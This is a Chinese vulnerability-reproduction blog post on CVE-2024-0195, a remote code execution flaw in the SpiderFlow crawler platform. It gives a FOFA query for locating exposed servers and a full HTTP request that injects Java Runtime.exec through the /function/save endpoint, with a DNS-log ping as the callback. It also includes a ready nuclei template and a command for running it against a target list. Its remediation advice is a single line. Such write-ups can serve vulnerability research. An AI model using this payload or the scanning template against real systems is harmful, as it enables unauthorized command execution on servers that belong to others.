[漏洞复现] CVE-2024-0195

admin 2024年1月12日17:46:48评论242 views字数 2221阅读7分24秒阅读模式

使

01

漏洞名称

SpiderFlow爬虫平台远程命令执行漏洞

02

漏洞影响

SpiderFlow爬虫平台

开源地址

https://gitee.com/ssssssss-team/spider-flow/

[漏洞复现] CVE-2024-0195

03

漏洞描述

SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发,因此收到很多人的喜欢,在gitee上有7.4K Star。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。

04

FOFA搜索语句
app="SpiderFlow"

[漏洞复现] CVE-2024-0195

05

靶场搭建

这是一个开源的java项目直接在本地IDEA中启动即可,首先下载源码

https://gitee.com/ssssssss-team/spider-flow.git

[漏洞复现] CVE-2024-0195

然后输入地址,点击clone

[漏洞复现] CVE-2024-0195

配置数据库,找到数据库脚本spiderflow.sql,在本地数据库中执行,创建数据库和表

[漏洞复现] CVE-2024-0195

然后修改数据库配置文件application.properties

[漏洞复现] CVE-2024-0195

配置一下maven之后会自动下载依赖包,然后直接运行即可

[漏洞复现] CVE-2024-0195

访问首页http://localhost:8088/

[漏洞复现] CVE-2024-0195

[漏洞复现] CVE-2024-0195

至此靶场搭建完毕

06

漏洞复现

首先注册一个dns账号http://dnslog.pw/dns/?&monitor=true,然后向靶场发送如下数据包,在靶场服务器上执行ping命令

POST /function/save HTTP/1.1Host: 192.168.40.130:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 121Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

dns平台收到ping请求记录

[漏洞复现] CVE-2024-0195

漏洞复现成功

07

nuclei poc

poc文件内容如下,在本地创建CVE-2024-0195.yaml文件,将内容粘贴进去即可

id: CVE-2024-0195info:  name: SpiderFlow爬虫平台RCE漏洞  author: fgz  severity: critical  description: SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发,因此收到很多人的喜欢,在gitee上有7.4K Star。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。  metadata:    max-request: 1    fofa-query: app="SpiderFlow"    verified: truerequests:  - raw:      - |+        POST /function/save HTTP/1.1        Host: {{Hostname}}        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0        Content-Type: application/x-www-form-urlencoded; charset=UTF-8        Accept: */*        Accept-Encoding: gzip, deflate        X-Requested-With: XMLHttpRequest        id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B    matchers:      - type: dsl        dsl:          - contains(interactsh_protocol, "dns")        condition: and

运行POC

nuclei.exe -t mypoc/其他/CVE-2024-0195.yaml -l data/SpiderFlow.txt

[漏洞复现] CVE-2024-0195

08

修复建议

收缩互联网攻击面。

原文始发于微信公众号(AI与网安):[漏洞复现] CVE-2024-0195

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月12日17:46:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [漏洞复现] CVE-2024-0195http://cn-sec.com/archives/2385408.html

发表评论

匿名网友 填写信息